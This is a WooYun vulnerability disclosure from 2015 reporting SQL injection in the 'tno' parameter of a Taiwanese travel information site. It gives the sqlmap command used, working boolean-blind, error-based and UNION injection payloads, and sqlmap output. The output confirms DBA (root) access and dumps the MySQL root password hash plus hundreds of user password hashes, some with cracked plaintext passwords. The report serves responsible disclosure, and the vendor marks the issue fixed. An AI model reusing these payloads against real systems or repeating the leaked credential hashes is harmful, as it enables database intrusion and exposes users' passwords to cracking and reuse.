当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153148

漏洞标题:清境旅遊資訊網某處存在SQL注射漏洞(DBA權限/root密碼泄露/大量用戶密碼泄露)(臺灣地區)

相关厂商:清境旅遊資訊網

漏洞作者: 路人甲

提交时间:2015-11-10 10:25

修复时间:2015-12-31 04:53

公开时间:2015-12-31 04:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-17: 厂商已经确认,细节仅向厂商公开
2015-11-27: 细节向核心白帽子及相关领域专家公开
2015-12-07: 细节向普通白帽子公开
2015-12-17: 细节向实习白帽子公开
2015-12-31: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

清境旅遊資訊網某處存在SQL注射漏洞(DBA權限/root密碼泄露/大量用戶密碼泄露)

详细说明:

地址:http://**.**.**.**/trip/trip.asp?tno=62

python sqlmap.py -u "http://**.**.**.**/trip/trip.asp?tno=62" -p tno--technique=BEU --random-agent --batch --current-user --is-dba --users --passwords --search -C pass

漏洞证明:

---
Parameter: tno (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tno=62 AND 1455=1455
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tno=62 AND (SELECT 2825 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(2825=2825,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: tno=-3346 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786271,0x6666596c5268686b4257,0x7170786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [1]:
[*] 'root'@'%'
database management system users password hashes:
[*] root [1]:
    password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0
Database: test
+-------+---------+
| Table | Entries |
+-------+---------+
| a     | 3       |
+-------+---------+
Database: cja
+-------+---------+
| Table | Entries |
+-------+---------+
| ad    | 6       |
+-------+---------+
columns LIKE 'pass' were found in the following databases:
Database: dbforhotel
Table: login
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| lPassword | varchar(32) |
+-----------+-------------+
Database: dbforhotel
Table: setting
[1 column]
+----------+------------+
| Column   | Type       |
+----------+------------+
| sAskPass | varchar(1) |
+----------+------------+
Database: imagebooks
Table: manger
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| passwords | varchar(20) |
+-----------+-------------+
Database: cja
Table: cjauser
[1 column]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| cuPassword | varchar(32) |
+------------+-------------+
Database: db
Table: sys_user
[1 column]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| surPassword | varchar(50) |
+-------------+-------------+
Database: user
Table: login
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| lPassword | varchar(32) |
+-----------+-------------+
Database: user
Table: setting
[1 column]
+----------+------------+
| Column   | Type       |
+----------+------------+
| sAskPass | varchar(1) |
+----------+------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: dbforhotel
Table: login
[21 entries]
+-----------+
| lPassword |
+-----------+
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
| +         |
+-----------+
Database: dbforhotel
Table: setting
[1 entry]
+----------+
| sAskPass |
+----------+
| 1        |
+----------+
Database: imagebooks
Table: manger
[2 entries]
+-----------+
| passwords |
+-----------+
| 9393      |
| arch      |
+-----------+
Database: cja
Table: cjauser
[22 entries]
+-----------------------------------------+
| cuPassword                              |
+-----------------------------------------+
| 0d0fd7c6e093f7b804fa0150b875b868        |
| 0deb1c54814305ca9ad266f53bc82511 (413)  |
| 1068c6e4c8051cfd4e9ea8072e3189e2        |
| 17d63b1625c816c22647a73e1482372b        |
| 4187db82d9b3c103dc996029dd723f55        |
| 4f4adcbf8c6f66dcfc8a3282ac2bf10a        |
| 5b69b9cb83065d403869739ae7f0995e (501)  |
| 69cb3ea317a32c4e6143e665fdb20b14 (402)  |
| 816b112c6105b3ebd537828a39af4818        |
| 8cb22bdd0b7ba1ab13d742e22eed8da2 (406)  |
| a4fa8d76cc8d25e6e1ad5a772dd951a5        |
| a96b65a721e561e1e3de768ac819ffbb (409)  |
| b337e84de8752b27eda3a12363109e80 (504)  |
| b337e84de8752b27eda3a12363109e80 (504)  |
| b337e84de8752b27eda3a12363109e80 (504)  |
| b9228e0962a78b84f3d5d92f4faa000b        |
| bbcbff5c1f1ded46c25d28119a85c6c2        |
| bbf94b34eb32268ada57a3be5062fe7d        |
| d6194c68fcc7e79bb57401be603cb1cc (arch) |
| e8c0653fea13f91bf3c48159f7c24f78        |
| f4f6dce2f3a0f9dada0c2b5b66452017        |
| ff4d5fbbafdf976cfdc032e3bde78de5 (506)  |
+-----------------------------------------+
Database: db
Table: sys_user
[0 entries]
+-------------+
| surPassword |
+-------------+
+-------------+
Database: user
Table: login
[268 entries]
+----------------------------------------------+
| lPassword                                    |
+----------------------------------------------+
| 009a2cb1bca0680ade76f99cf0f43359             |
| 00be3dbda5eaec57e207b57cdcedfb47             |
| 00feda47d7e1343a69615bc90b98615c             |
| 01519e0b9ef69b7d1efc4f811050a9fd             |
| 0364dccc14c12839c208a9e4b8172a2c             |
| 038c1936dd7a2925029d760630cb7a2e             |
| 03b1d0aec9a4b63565d998fc75c2b53a             |
| 0448255f04404e9ae794cd073705bd1e             |
| 04fa890e792fd9a26e2d4827c0080f64             |
| 0869cf46fd51daaf1ee9ad0a2d2dba6a (ingrid)    |
| 0a1b155a18955b296570055080afb493             |
| 0a24c3e19f0b5f296b92bb590d2d3b98             |
| 0b8403849dfcb9fb671be4079ea44301             |
| 0d4ee82d91f12ae2e4f00a77510e5cbe             |
| 0d54ea5793476a089330c69c3c492600             |
| 0dcf69b28cb77a0d1af027e2ee033776             |
| 0f28f045467b0d48df688ef80b2bdbe1             |
| 102f59d14de3b3c2439a029cf7365458             |
| 10c91836d0ec967f23ac4f3fdf537584             |
| 113180fa10fcf7a118ecdbcd21c4cd24             |
| 11513f0395b5a9f667eba7d3a4e78c87             |
| 12884181754cbf0dbb3584ba42730ed5             |
| 13a51a7d8b5d448004712800ca7ba194             |
| 1582bbda0d1168f570cdecc3bf2a5277             |
| 1675200c44369622e113989cf0b88eb1             |
| 16c6885f3b6013d96aaa9510ed954ee8             |
| 1702ea895ec4c5bba91770a68b873428             |
| 181b23679f5f42c79a74a063ffcc4024             |
| 19c615265241c83e601d181c29ba85a3             |
| 1ace5b8364407507910b324dcde3c894             |
| 1c208ee88299e7d6d6eff86e6879384e             |
| 1cf4542159248840add6e42bbf0a36a4             |
| 1e05855b023dededf3edb94b408052b2             |
| 1e274228c5c32439cad84f967cb43ff8             |
| 217d3def9e43ec681a3fb63c4a4f96e2             |
| 2346b2b92b469bc6d9bd1153909f6506             |
| 23a306c84a8ad7859f02be041582b193             |
| 242cd53ed09e4c3aa8a8c8ebba8157c5             |
| 250b76af0b9e34cd12acfefaf512af6e (9746)      |
| 25ddcec74d1e39aa1c1337144f1828d4             |
| 25f9e794323b453885f5181f1b624d0b (123456789) |
| 25f9e794323b453885f5181f1b624d0b (123456789) |
| 26cd8ecadce0d4efd6cc8a8725cbd1f8 (8850)      |
| 275746fc9c2bb0d93fc6d5c97b858a75             |
| 27774ebf825a5688f090a43e53d09049             |
| 2868cd0c1cb042d504a0a6bdeace28cc             |
| 287fc889941fc09b9d1990ed49503f43             |
| 2895e765d07fb44f64fde5b3aa1b87cc             |
| 29381596cb8ba7752e1d8b01de048ceb             |
| 2a5c88814e84a633d4213107490686c3 (0719)      |
| 2b5bf2b774425226f26519d2e1593d08             |
| 2d71048e4dbd42b2b4978b48129a4288             |
| 2ee32d598c37689b8e1e2fecd5624376             |
| 2f7b52aacfbf6f44e13d27656ecb1f59             |
| 300f36d25fcc38a80315a57cb83081fd             |
| 303640f09610c5431499d2fcd814c229             |
| 305c0967b1297eca1c29d058e6c89f03             |
| 31405671c55d5bff0279b234fe5d241c             |
| 315339fddfa797cbdda13b93b54b6e52             |
| 339fc0de8c41796fa09d414c739143c5             |
| 3433ae01020bcca2d61ae59432ba1739             |
| 3433e795e7f81f6c60e8ef0b3f6f846a             |
| 3439cfadbb1f7e8f8a2414b054345399             |
| 34adb34803a7dbc17587465820b3a111             |
| 34ca67a05cbc9d9446178fd278d06625 (585858)    |
| 35461f509fb18bd26fa824137d334aee             |
| 35ad3e7e401eb19d270ee656f34770e3             |
| 37ab04ec0b9cf2be507890d02c6d8b02             |
| 3af5d81e4a6e50258c1455abdfb6cd06             |
| 3b3cfe077f7437e1492bd8e37e5bb1f0             |
| 3bbe7117fa9a2ed2f3265e072ebf8b52             |
| 3df06f597b9d174afa8599548e535b8e             |
| 4150d6a4725ff1484640c9d2e458a429             |
| 4187db82d9b3c103dc996029dd723f55             |
| 420a8aa33c2dfb1df5cde5679757264e             |
| 4249b76316c0b5c4630c9ea435d01d38             |
| 4297f44b13955235245b2497399d7a93 (123123)    |
| 434fa0f960cfef390270a185b5985282             |
| 44e45a4cb7cf666496bcd2183d9662b4             |
| 454822534bff14221be1d9dea999fb43             |
| 45bf417955f7852c626efac2c0f27b0a             |
| 4671d65566923b89254addb3b614602d             |
| 46f57c18dd40ccaaffb17103d16e6aa0             |
| 4798a43cdd8c54b704820a776e7cb326             |
| 48362ade17cd04b0d84467a405bf673a (a123321)   |
| 490d240500d99a28095d2a3721a0d4a5             |
| 492470b9b083e5d89c5936bdee84f304             |
| 4a7d1ed414474e4033ac29ccb8653d9b (0000)      |
| 4aed5e9fd2cacf9d17c3199a2554e7e2             |
| 4aee31b0ec9f7bb7885473d95961e9a6             |
| 4d5fcc495cd66c936ce57bc7a03d1d04             |
| 4e51f7c2e8c5ff0f44469e3f82e5e549             |
| 5072ec0261a35740089ed41e844e51eb (0116)      |
| 5164474aa0d9bcf0f142a33a835f9400             |
| 51fbd31b0da181b173183fb3013bd52a             |
| 5510668a4808817548965564f82d99fd             |
| 57a166428dc15a54dbe19584ec88dfd4             |
| 58e32dedaa5ed5360eaa20b63fcc8602             |
| 5912d7bfd10f631f1715bf85bbb72d97 (genius)    |
| 5a83df9b428796ad3902f05ae72d5910             |
| 5b7d9a44b8268ada5ce75af91e74186b             |
| 5cd4076da2cfd26a06bcd015fc03cc81             |
| 5e82de16115a4a7d7f0b7d45ebd67481             |
| 5eb13cb69b6e20dd7a42030f5936a9dc (4141)      |
| 5eba93870d07855ec55ffa72e726b9ed             |
| 601a17fa8a2c225a128be6feb6e9b6fd             |
| 611614c0475914484ae9c6030f9a83a2             |
| 64d7632ebb5bfbea6dbc91138c0fb97d             |
| 65cf24929e1e75a076a1652537c49314             |
| 65cf24929e1e75a076a1652537c49314             |
| 66061e1c27617343b588290b2e14f8cd             |
| 6691fc7e69b32d0879c93714a75e5e9c             |
| 672b3b33624db72f94cd3fce0eff42ae             |
| 685bd453c8814e37630476814db5b8c8             |
| 688ef071d72fb3211036b28a42bd2665 (868890)    |
| 696fe28aea9b55b70b516ffa24905611             |
| 6993349110c45fdfb41a5d4ad6b3e90b             |
| 6c5b89c0c2e4d784cb942370434589b5             |
| 6ced8a776ace417a6114af7636e4e62f             |
| 6f4a97a92ddfbe8e84d79c8c99272583             |
| 71a7af9fa2438ddbdf48efc20c9907fe             |
| 722dfecfd1aa972b8bc6b1b69bd7ab35             |
| 728febaebd6038e30a192befc66284a2             |
| 74212b7fdfd0329885256369001a3a37             |
| 776c3e88bd7e379297ab7cb35525b1de             |
| 7852136456120515d26c4520147773e8             |
| 798760b8632fa4b1eed42e567a2a486e             |
| 7a1b5d24b5900a79442f4ed8801e6692             |
| 7a51de0f9730f5fd6cf6f55ef81e6a8d             |
| 7a54c743208b8225a1800a014caa7d1c             |
| 7a6e033c942e803efd28c651c48e3812             |
| 7bc1ec1d9c3426357e69acd5bf320061 (2173)      |
| 7c45995740b00862cadef1fccc00029a             |
| 7cb5d30e9a0808c14691f556b3fdf8df             |
| 7cf17bd25e975c746dea84308e3aad80             |
| 7d2e5882dd2cf185f79d26c953a0dc2e             |
| 7d84f5291e70d50acce3f5a8e68eb015             |
| 7d8690e7c90ce297f91d531b2db27f28             |
| 7f54f42cf64cf1452b1149aa312abfa4             |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234)      |
| 826293f696594b986ec256f6faf922e5             |
| 82dab982fb01ce5a9e6abd13dd3a6643             |
| 837c7233ae668118b1540ee74c914924             |
| 83f9e9cfe7b556e001ad417d2f564d95             |
| 850d1ae6600ec13c04d3e4154d8bf3f7             |
| 86109d400f0ed29e840b47ed72777c84 (1345)      |
| 86d84a422dadd01e48c96cc07dad5d42             |
| 87da4e8d71a37d89091fe02bf0f37b45             |
| 87eed799a2955dbddad1a9468dc86845             |
| 881f27c2c5c2735edc32525a975ab3e9             |
| 89fc98242b942895ea1ead5dd17cff09             |
| 8b35ee4dd1bc9f0f6b625cc244c5df72             |
| 8ea8f66405b67b744e715f1a8a56f478             |
| 8fc2449dfd43c0ae7a1be455384510cc (101899)    |
| 908a7aa45bc75776f561d996cc24559e             |
| 90ad3922d652e3d173340e0464c8a88e             |
| 9191051bbc7d0ecda2783406bcb12778             |
| 91a92d2ed473c35322e56d769b1c9999             |
| 92088e7a77ccf73d39b0b4220e3e6d81             |
| 925c842568735e2c2ef592754d75652e             |
| 92c3ae0cffae609cddaea7de8e8b5623             |
| 95b0bfd1501a65bdfa1dc71dba61c9c6             |
| 9800aa6dd63426e5155b76b184510f46             |
| 98110dd39d6e8fda7ea99e5c927932af             |
| 98d6aa0e1e79787fbea68e24bc411dad             |
| 9926e4ea65803b814bd721d910edf1e5             |
| 9a542ab529973cb8797e49121763bcee             |
| 9b9ef309769410149765f4ba001d2396             |
| 9bc565b8841e4aef3ae27cec20fb9c0c             |
| 9d0b2d24b1891b1cdbf46eae7033ce24             |
| 9e57e4ce19d5fdf62c98318c44f46e51             |
| 9f31d384c09d3c41b182ca0fe3402d11             |
| 9f9cfc306da6b52da8f9b7a1c2431079             |
| 9fc7c65f71e9f8db03b428133221c015             |
| a145a82ecb5bbe10a9551bc702f94674             |
| a2ecd3e30603e42283d8a1bd89a72d5a             |
| a35473cf94d983e392c83b24d265f3c1 (0903)      |
| a3e451b95c56bfb559ff46916f4f7b62             |
| a417506f46c069853567f365987caded             |
| a530e7df91ba502bd8c916941b124a51             |
| a574772d83ca8cd22c25178fd74ba2cc             |
| a7dd973b687a5de9c458cf2a46ad9202             |
| aa3d5da98a8b3cb04b72d02a5301bc21             |
| aa700b482229770e61764dfd004a9ace             |
| abc17db885b963a3f08ccc8a3e8a64ef             |
| ac28738bde349b8252e39016b57caf65             |
| ad1aee19f0d57b63d5870456804df1ee             |
| ad6be5d50cd75b53ed69e7cb5a98bf40             |
| ad808dca31029ed6de2d69d2f3457827             |
| adef61f32ab894720b40336c1d665812             |
| ae56c4ee8aa8d0aaa347f6c6ee7e2118             |
| b056ca975ed8ec61f2ec684237551e87             |
| b0b87703bd9ac844523d1ce1bb586789             |
| b0e86e403ecda3d4d076070b34ccdcd0             |
| b16ff47cad642cf006d3f51bbf3e0930             |
| b1e37a4702703c25ee29f4edfe3162fc             |
| b206e95a4384298962649e58dc7b39d4 (1314520)   |
| b5413044ab67452daedf6ee2d87b9f09             |
| b55140f86a1264e563fd0fc6af2e9223             |
| b71d3077247ce1eef88aac0e295c2174             |
| b7e63e546fd6e89bdac7bc9fad42921f             |
| b8f6c71d9e71fd2a1f0aafdda3cbaa10             |
| bcfc803d83cf8ce4253e8ea7953bbf63             |
| c168a2bc673be90e75392d921959237c (forget)    |
| c1e2e6cd57970b7cf6b5fa7829a182e1             |
| c536b97a3e970a89cb6dd8442c53d0ca             |
| c538f8c4f6b91786f31f2fe08e71ed05             |
| c737f8befdfbc3616cd14d8cc706c407             |
| c9a8b379f223e84003966c874be95ab7             |
| cd31a63c3bde9aa8ab5e08a6b3be1bf5             |
| cd349dcd8058abb8202e8d6d4104f22b             |
| cd5607d9ca45f5f8be107f49e830302c             |
| ce33ed99cfe9d2a80a14fd3bdec33986             |
| d0053710e48063097bfe6719953dab0e             |
| d005ec5d125abb906d89852438b865bc             |
| d02519e560d7cbba34156f3577221af5             |
| d05820e590398109daa9dd532e0e8591             |
| d09dbe4ee0a5cba6ad39faa50cdbae45             |
| d124d589f088840d5c8d0c5a59f8b4a9             |
| d279f5abf23428b8c5ec3abe6f908294             |
| d2fdf41879e22098ddf642d1c24dc42d             |
| d54c4633efd46bb9d2b123712866c4d5             |
| d6bdb1b333a9a72e8e27ae28be1561a1             |
| d6c73748e0cf4f330533b8075d0fb359 (11291129)  |
| d8e6eeb43351126b0d79d8f1ef47d541             |
| da5747496d061449d54c5cfa99ab8f8b             |
| da575dc775d9d624168d33fec780ce27             |
| db8b873ce1e64086eadb629bc7f0e391             |
| dd4b21e9ef71e1291183a46b913ae6f2 (00000000)  |
| ddba4c0c534e67200b9a1fa46f73383d             |
| e07cea1eba0110d5d177671f0bedc501             |
| e10adc3949ba59abbe56e057f20f883e (123456)    |
| e18d892343a5199bcdc78ab928aa4a3e (12201220)  |
| e2fcd951094d581d859f7ae5b6574759             |
| e3bb38d9e4878be26d4119c440d190f0             |
| e43954e611fdce182ffc99af379706c6             |
| e4a406d8f1b4ac445e07a40c405b2233             |
| e56452e61eb9819e13d6dede611de446             |
| e5839e3d9b95274227b3a345f928d3c2 (amyamy)    |
| e78d968a16cf027b320f376df4b7609c             |
| e9e7b5bd8b3f3857734330111152983f             |
| eaa2a7627a81936c701eeacf52ae2185             |
| eb33664e0f93d980d519d3d42ec96ed3             |
| eb5ba7c977d21014520ad3ee0432d10f (bonnie)    |
| ecc69fa2a73db49e7260b3c95fc53a42             |
| eec4acceead728611c917ec2b7a4f250             |
| ef893ebd50204246f1fbc0ffa445c9e1             |
| f0898af949a373e72a4f6a34b4de9090 (7654321)   |
| f0d7fbac0e8b160f7a55761cb8246c66             |
| f1f2df02c4d5fc86d3e8a389243e9f00             |
| f215c71cf56ae8a30ea8b0e6ea74256b             |
| f2b657079f35078b8980844ae75dc782             |
| f2cabb3aa67f89143f45047f1bcc71ef             |
| f52acd1383262ab45d13f44ad5ed1ec5             |
| f62862c61c52044e7e733947f2f29153             |
| f64c75e2837d4868f78ca419fef398d4             |
| f746510324676c3228b9e858d6861eaa             |
| f7f57e9999dc0ba338f9cbcfa63f6d9e             |
| f863061e816b47c14183a1e78743e60d             |
| fa4e91a6b31e94b5f0ff21fb3afd6692             |
| fb0a0270cb33f8a6e54fd987ff2a9927             |
| fb11f20f89ac7ab2cab050c5fae0b9cc             |
| fb7b1b1ae1520a4ad940386eef95488a             |
| fba85b69b8fd1c3bc952daff33b50627             |
| fcea920f7412b5da7be0cf42b8c93759 (1234567)   |
| fe014a7d04dca9a8ee115c60bd5c6173             |
| ff0fe8e645f272e3467fcb1c90948a0c             |
| ff92a240d11b05ebd392348c35f781b2             |
+----------------------------------------------+
Database: user
Table: setting
[1 entry]
+----------+
| sAskPass |
+----------+
| 1        |
+----------+
Database: mysql
Table: user
[5 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *8F5193A299A2DAF5042290B9A10E1284C8600CE0 |
| *8F5193A299A2DAF5042290B9A10E1284C8600CE0 |
| *8F5193A299A2DAF5042290B9A10E1284C8600CE0 |
| *8F5193A299A2DAF5042290B9A10E1284C8600CE0 |
|
+-------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-17 13:42

厂商回复:

感謝通報

最新状态:

2015-12-31:已修復